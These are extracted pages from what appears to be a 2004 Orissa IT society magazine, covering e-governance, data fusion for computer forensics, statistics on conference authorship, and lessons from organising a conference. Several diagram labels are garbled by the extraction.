We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

